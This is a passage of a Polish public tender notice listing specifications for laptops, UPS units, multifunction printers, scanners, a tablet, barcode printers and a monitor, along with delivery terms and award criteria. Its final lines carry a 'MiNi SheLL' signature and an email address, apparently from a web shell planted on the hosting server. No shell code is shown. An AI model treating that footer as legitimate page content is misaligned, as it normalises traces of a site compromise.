przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście PassMark - CPU Mark.Matryca (przekątna) Od 15 do 16 caliMatryca (rozdzielczość) Min. 1920 x 1080 pikseliMatryca (powłoka) AntyrefleksyjnaMatryca (typ)	IPS [LED]Pamięć zainstalowana (pojemność) Min. 32 GB Pamięć (technologia) 2400 MHz (DDR4)Rodzaj dysku twardego SSDPojemność dysku	Min. 960 GBKarta graficzna (model) Zintegrowana Intel UHD Graphics 620 lub równoważna tzn, uzyskująca w rankingu Passmark G3D Mark wartość minimum 1000. Jeżeli osiągi zaoferowanej karty graficznej nie będą ogólnie dostępne tj. na oficjalnych stronach producenta lub w rankingach niezależnych organizacji, Wykonawca zobowiązany będzie do przeprowadzenia testów na własny koszt i udokumentowania Zamawiającemu, że oferowany procesor osiąga wymagany wynik punktowy w teście Passmark G3D Mark.Dźwięk	Zintegrowana karta dźwiękowa Wbudowane głośniki stereoWbudowany mikrofonŁączność	BluetoothWi-Fi 802.11 a/b/g/n/acLAN 1 GbpsRodzaje wyjść / wejść	DC-in (wejście zasilania)HDMIRJ-45 (LAN)Min. 1 x USBMin. 1 x USB 3.1 typ CMin. 2 x USB 3.1Wyjście słuchawkowe/wejście mikrofonoweCzytnik kart pamięci	TakKamera internetowa	TakDodatkowe informacje	Wydzielona klawiatura numerycznaSystem operacyjny	Microsoft Windows 10 Professional 64-bit PL lub równoważny - przez równoważność Zamawiający rozumie pełną funkcjonalność, jaką posiada wskazany system operacyjnyW zestawie Torba, mysz <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30200000-1, 30210000-4, 30213100-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 30<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Zamówienie zostanie zrealizowane w terminie zgodnym z oświadczeniem zawartym w ofercie Wykonawcy, nie dłuższym niż: 30 dni. Przy czym termin realizacji powinien być wskazany w dniach (nie w godzinach, dobach itp.) i być nie krótszy niż 3 dni. <br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Część nr 3</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZASILACZ AWARYJNY UPS - 6 SZT.Moc pozorna	Min. 700 VAMoc rzeczywista	Min. 390 WArchitektura UPSa	Line InteractiveTyp przebiegu	Schodkowa aproksymacja sinusiodyCzęstotliwość wejściowa	50/60 Hz +/-3 Hz (automatyczne wykrywanie)Nominalne napięcie wejściowe	230VTyp gniazda wejściowego	IEC 320 C14Złącza wyjściowe	Min. 4 x IEC 320 C13 (Zasilanie zapasowe)Ochrona linii danych	RJ-11 (Modem/faks/DSL)Złącza komunikacyjne	USBUkład automatycznej regulacji napięcia (AVR)	TakTypowy czas pełnego ładowania akumulatora	Max. 6 godzinPanel sterowania	Wyświetlacz statusu LED ze wskaźnikiem pracy onlineZasilanie akumulatoroweWskaźniki Wymień baterię i PrzeciążenieAlarmy dźwiękowe	Alarm przy zasilaniu akumulatoraalarm przy bardzo niskim poziomie naładowania akumulatoraciągły sygnał dźwiękowyCzęść III URZĄDZENIE WIELOFUNKCYJNE - wariant I - 3 SZT.Typ urządzenia	Wielofunkcyjne kolorowe urządzenie laseroweFunkcje	Drukarka, Kopiarka , Skaner, FaksPanel sterowania	Kolorowy ekran dotykowy LCDMaksymalny rozmiar papieru	A4Szybkość procesora	Min. 800 MHzPamięć	Min. 1 GBInterfejs	USB 2.0 Hi-Speed10BASE-T/100BASE-TX/1000Base-Tłączność bezprzewodowa 802.11b/g/nbezpośrednie połączenie bezprzewodoweDrukarkaSzybkość drukowania	Min. 27 str./min (jednostronne A4)Rozdzielczość drukowania	Min. 600 × 600 dpiCzas rozgrzewania	Maks. 13 sekund od włączenia zasilaniaCzas pierwszego wydruku	Tryb kolorowy: maks. 8,6 sTryb monochromatyczny: maks. 8,3 sTryb oszczędzania toneru	TakDrukowanie z klucza pamięci USB	TakKopiarkaSzybkość kopiowania	Min. 27 str./min (jednostronne A4)Czas druku pierwszej kopii	ADF (A4):Kolorowe: maks. 12,0 sMonochromatyczne: maks. 10,2 sPłyta szklana (A4):Kolorowe: maks. 11,3 sMonochromatyczne: maks. 9,8 sRozdzielczość kopiowania	Min. 600 x 600 dpiKopiowanie dwustronne	Dwustronny-dwustronny (automatycznie)Kopiowanie wielokrotne	Do 999 arkuszyPomniejszenie/powiększenie	25-400% ze zmianą co 1%SkanerTyp	KolorRozdzielczość skanowania	Optyczna: min. 600 x 600 dpiInterpolowana: do 9600 x 9600 dpiGłębia koloru skanowania	Min. 24 bity / 24 bity (wejście/wyjście)Skala szarości	Min. 256 poziomówTryby skanowania Skanowanie do wiadomości e-mailSkanowanie do komputeraSkanowanie do USBSkanowanie do serwera FTPFormaty plików	TIFF, JPEG, PDF, kompaktowy PDF, PDF z możliwością wyszukiwaniaFaksSzybkość modemu	Min. 33,6 kb/sTryb odbierania	Tylko faks, przełącznik faks/telefon, tryb automatycznego odbioru, tryb ręcznyMaksymalna rozdzielczość faksu	Min. 400 × 400 dpiPamięć faksu	Do 512 arkuszySzybkie wybieranie	Do 281 pozycjiFaksowanie dwustronne	Tak (wysyłanie i odbiór)Obsługa nośnikówTyp skanera	Płyta szklana, dwustronny podajnik ADF (jednoprzebiegowy)Podajnik papieru	Kaseta o pojemności min. 250 arkuszyPodajnik uniwersalny na min. 50 arkuszyAutomatyczny podajnik dokumentów na min. 50 arkuszyOdbiornik papieru	Min. 150 arkuszyTypy nośników	Papier zwykły, papier z makulatury, papier gruby, papier cienki, papier kolorowy, papier błyszczący, etykiety, karty pocztowe, kopertyRozmiary nośników	A4, A5, B5, Legal, Letter, Executive, Statement, karty pocztowe, kopertyGramatura nośników	od 52 g/m? do 200 g/m?Drukowanie dwustronne	AutomatycznyDodatkowe informacjeDodatkowe wyposażenie	Kabel USB URZĄDZENIE WIELOFUNKCYJNE - wariant II - 1 SZT.Typ urządzenia	Wielofunkcyjne kolorowe urządzenie laserowePrędkość drukowania i kopiowania	Min. 30 str. A4 na minutę w kolorze i monoRozdzielczość	Drukowanie min. 1200 x 1200 dpi, kopiowanie i skanowanie min. 600 x 600 dpiCzas nagrzewania	maks. 26 sekundCzas pierwszego wydruku	Ok. 6,5 sekund w mono, ok. 7,5 sekundy w kolorze lub mniejCzas pierwszej kopii	Ok. 8,5 sekund w mono, ok. 10 sekund w kolorze lub mniejProcesor	Min. 1 GHzPamięć	Min. 1024 MBPrędkość skanowania	min. 60 obrazów na minutę i podajnik na min. 75 arkuszy z funkcją obracania dokumentuOpcje wydruku	Dwustronne drukowanie, kopiowanie, skanowanie i faksWyświetlacz	min. 7-calowy kolorowy ekran dotykowyInterfejsy	USB 2.0 (Hi-Speed), 2 x USB Host 2.0, Gigabit Ethernet (10BaseT/100BaseTX/ 1000BaseT), opcjonalnie Wi-Fi (IEEE 802.11b/g/n), gniazdo eKUIO na dodatkowy serwer druku, gniazdo na opcjonalną kartę SDDrukowanieDodatkowe możliwości drukowania	Funkcje bezpieczeństwa: IPsec, SNMPv3, IPPS, druk bezpośredni szyfrowanych PDF, wydruk prywatny, wydruk bezpieczny przez SSL, POP przez SSL, SMTP przez SSL, Obsługiwane Systemy Operacyjne (Wydruk)	Wszystkie bieżące wersje Microsoft Windows, Mac OS X wersja 10.8 lub wyższa, UNIX, LINUX KopiowanieMaksymalny rozmiar oryginału	A4/legalDodatkowe możliwości kopiowania	Skanu-raz-kopiuj-wiele, elektroniczne sortowanie, 2na1, 4na1, kopia dowodu tożsamości, automatyczny wybór kasety, pomijanie pustych stronZakres zoom	25 - 400 % co 1% Ustawienia obrazu	Tekst, Zdjęcie, Tekst + Zdjęcie, Grafika/Mapa, Wydrukowane dokumentySkanowanieFormat kompresji	MMR/JPEGTyp pliku	TIFF, PDF, PDF/A , wysoko skompresowany PDF, JPEG, XPSFunkcje	Skan kolorowy, wewnętrzna książka adresowa, wsparcie Active Directory, szyfrowana transmisja danych, wysyłanie do kilku miejsc jednocześnie (e-mail, fax, SMB/FTP folder, print), pomijanie pustych stronRozpoznawanie oryginału	Tekst + Zdjęcie, Zdjęcie, Tekst, Tekst (zoptymalizowany pod OCR)Funkcjonalności skanera	Skan-do-email, Skan-do-FTP, Skan-do-SMB, Skan do USB Host, Local/Network TWAIN, WIA , skan WSDRozdzielczości	600, 400, 300, 200 dpi, min. 256 odcienie szarościSzybkość skanowania	Min. 60 obrazów na minutę (300 dpi, A4, mono), min. 40 obrazów na minutę (300 dpi, A4 , kolor), min. 26 obrazów na minutę (300 dpi, A4, mono, dupleks), min. 17 obrazów na minutę (300 dpi, A4 kolor, dupleks)FaksSzybkość modemu	Min. 33,6 kbpsPrędkość skanowania	Maks. 2 sek.Funkcje faksu	Faks internetowy, wysyłanie i odbiór z obrotem obrazu; wysyłanie i odbiór z szyfrowaniem, polling, rozsyłanieObsługa papieruModuł dupleksu	Obsługa papieru 60-163 g/m2; A4, A5, B5, Letter, LegalPojemność wejściowa	Min. 100-kartkowy podajnik wielofunkcyjny; 60-220g/m2, A4, A5, A6, B5, B6, Letter, Legal, Folio, inne (70 x 148 to 216 x 356 mm). Kaseta uniwersalna na: min. 250 arkuszy 60-163 g/m2, A4, A5, A6, B5, B6, Letter, Legal, Folio, inne w zakresie (105 x 148 to 216 x 356 mm).Pojemność wyjściowa	250 arkuszy wydrukiem do dołu z czujnikiem przepełnienia Podajnik dokumentów	Podajnik dokumentów z funkcją odwracania dokumentu: 75 arkuszyDodatkowe informacjeDodatkowe wyposażenie	Kabel USB URZĄDZENIE WIELOFUNKCYJNE - wariant III - 1SZT.Typ urządzenia	Wielofunkcyjne monochromatyczne urządzenie laseroweFunkcje	Drukarka, Kopiarka , SkanerWyświetlacz	TakMaksymalny rozmiar papieru	A3Szybkość procesora	Min. 300 MHzPamięć	Min. 256 MBInterfejs	USB 2.0 Hi-Speedkarta sieciowa 10Base-T/100Base-TXPrędkość	Min. 22 str./min. (stron na minutę)DrukarkaRozdzielczość drukowania	Min. 600 × 600 dpiCzas wydruku pierwszejstrony	maks. 14 sekundDruk dwustronny	TakDrukowanie z klucza pamięci USB	TakFunkcje drukowania	Drukowanie broszur, Dokumenty mieszane, N-stron, Drukowanie plakatu, Znaki wodneKopiarkaSkaner dokumentów	Szyba i podajnik DADFCzas druku pierwszej kopii	Kopiowanie z szyby - nie więcej niż 7,2 sekundyRozdzielczość kopiowania	Min. 600 x 600 dpiStrony (wejście:wyjście)	1:1, 1:2, 2:1, 2:2Liczba	1-999Funkcje kopiowania	Zmniejszanie/powiększanie, kilka stron na arkuszu, kopiowanie dokumentu tożsamości, rozjaśnianie/przyciemnianie, automatyczne obracanie, oszczędzanie toneruSkanerRozdzielczość skanowania	Tryb monochromatyczny: 600 x 600 dpi, 400 x 400 dpi,300 x 300 dpi, 200 x 200 dpiKolor: 300 x 300 dpi, 200 x 200 dpiSkala szarości	Min. 256 poziomówTryby skanowania Skanowanie lokalneSkanowanie do wiadomości e-mailSkanowanie do sieci SMBFormaty plików	TIFF, JPEG, PDFObsługa nośnikówPodajnik papieru	Taca o pojemności min. 250 arkuszyTaca boczna o pojemności min. 100 arkuszyAutomatyczny podajnik dokumentów na min. 110 arkuszyOdbiornik papieru	Min. 250 arkuszyTypy nośników	Papier zwykły, papier z makulaturyRozmiary nośników	A3, A4, B4, B5Gramatura nośników	od 60 g/m? do 216 g/m?Drukowanie dwustronne	AutomatycznyDodatkowe informacjeDodatkowe wyposażenie	Kabel USB DRUKARKA LASEROWA - 1 SZT.Technologia druku	Laserowa monochromatycznaPrędkość drukowania	Do 40 stron A4 na minutęCzas nagrzewania	Maks. 15 sekundCzas wydruku pierwszej strony	Maks. 6,4 sekundyMaksymalna rozdzielczość	Min. 1200 dpiAutomatyczny druk dwustronny	TakPamięć	Min. 256 MB Gramatura papieru	60 - 220 g/m? Pojemność wejściowa	Min. 350 arkuszyPojemność wyjściowa	Min. 250 arkuszyObsługiwane formaty nośników	A4, A5, A6, B5, Letter, LegalEmulacje	PCL 6, PCL 5e, PostScript 3, bezpośrednie drukowanie PDF oraz XPSInterfejsy	USB 2.0 (Hi-Speed)USB HostGigabit Ethernet (10BaseT/100BaseTX/1000BaseT)Dodatkowe wyposażenie	Kabel USB SKANER - 1 SZT.Typ	Stacjonarny skaner dokumentów w formacie A4Funkcje	Skaner fotografii, dokumentów i kliszJakość skanowania	Min. 4800 x 4800 dpi (zdjęcia i dokumenty)Min. 9600 x 9600 dpi (klisze)Skanowanie	Oprawione slajdy 4 x 35 mm i klisze (tylko odcinki kliszy)Automatyczna korekta obrazu	Wbudowana technologia Fare (poziom 3) usuwa zabrudzenia i zarysowania oraz koryguje wyblakłe obszaryPrędkość skanowania	Około 7s (A4, w kolorze, 300dpi)Inne	biała dioda LED  TABLET - 1SZT.Przekątna wyświetlacza	Min. 10.8 caliRozdzielczość	Min. 2560 x 1600 pikseliTechnologia dotykowa	PojemnościowyProcesor	Min. 2.1 GHz, min. 8 rdzeniPamięć RAM	Min. 4096 MBInterfejsy komunikacyjne	Bluetooth, WiFi 802.11 a/b/g/n/acSystem operacyjny	Android DRUKARKA KODÓW KRESKOWYCH - 2SZT.Rodzaje druku	Termiczny, termotransferowyRozdzielczość drukowania	203dpiMaksymalna szerokość druku	104mmMaksymalna długość druku	990mmPrędkość druku	127 mm/sPamięć	8MB RAM/4MB FLASHInterfejsy	USB, LPT, EthernetDrukowane kody kreskowe	1D: Codabar, Code 11(ZPL), Code 39, Code 93, Code 128, EAN-8, EAN-13, EAN-14 (ZPL), German Post Code (EPL), GS1 DataBar (RSS), Industrial 2-of-5 (ZPL), Interleaved 2-of-5, ISBT-128 (ZPL), Japanese Postnet (EPL), Logmars (ZPL), MS1, Plessey, Postnet, standard 2-of-5 (ZPL), UCC/EAN-128(EPL), UPC-A, UPC-A I UPC-E z rozszerzeniami 2- lub 5-cyfrowymi EAN, UPC-E, UPC i rozszerzenia 2- lub 5-cyfrowe EAN (ZPL)2D: Codablock (ZPl), Code 49 (ZPL), Data Matrix, (ZL), MaxiCode, MicroPDF417, PDF417, QR CodeJęzyki programowania	EPLII, ZPLI, ZPLIIDyspenser (odklejak)	Tak MONITOR - 1 SZT.Format ekranu monitora	PanoramicznyPrzekątna ekranu	Od 24 do 25 caliProporcje obrazu	16:9Wielkość plamki	Min. 0.311 mmTyp panela LCD	TFTTechnologia podświetlenia	Diody LEDRozdzielczość obrazu	Min. 1920 x 1080 pikseliCzas reakcji matrycy	Max. 5 msJasność	Min. 250 cd/m2Kontrast	Min. 1000:1 (statyczny)Min. 12000000:1 (dynamiczny)Głośniki	TakZłącza wejściowe	D-SubDVIHDMIDodatkowe złącza	Złącze słuchawkowe (Jack)?Audio Line In/Out?Wbudowany zasilacz	TakMożliwość pochylenia panela (tilt)	TakMontaż na ścianie (VESA)	TakDodatkowe informacje	Funkcja Flicker Free<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30200000-1, 30216110-0, 42962000-7, 30213200-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 30<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Zamówienie zostanie zrealizowane w terminie zgodnym z oświadczeniem zawartym w ofercie Wykonawcy, nie dłuższym niż: 30 dni. Przy czym termin realizacji powinien być wskazany w dniach (nie w godzinach, dobach itp.) i być nie krótszy niż 3 dni. <br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com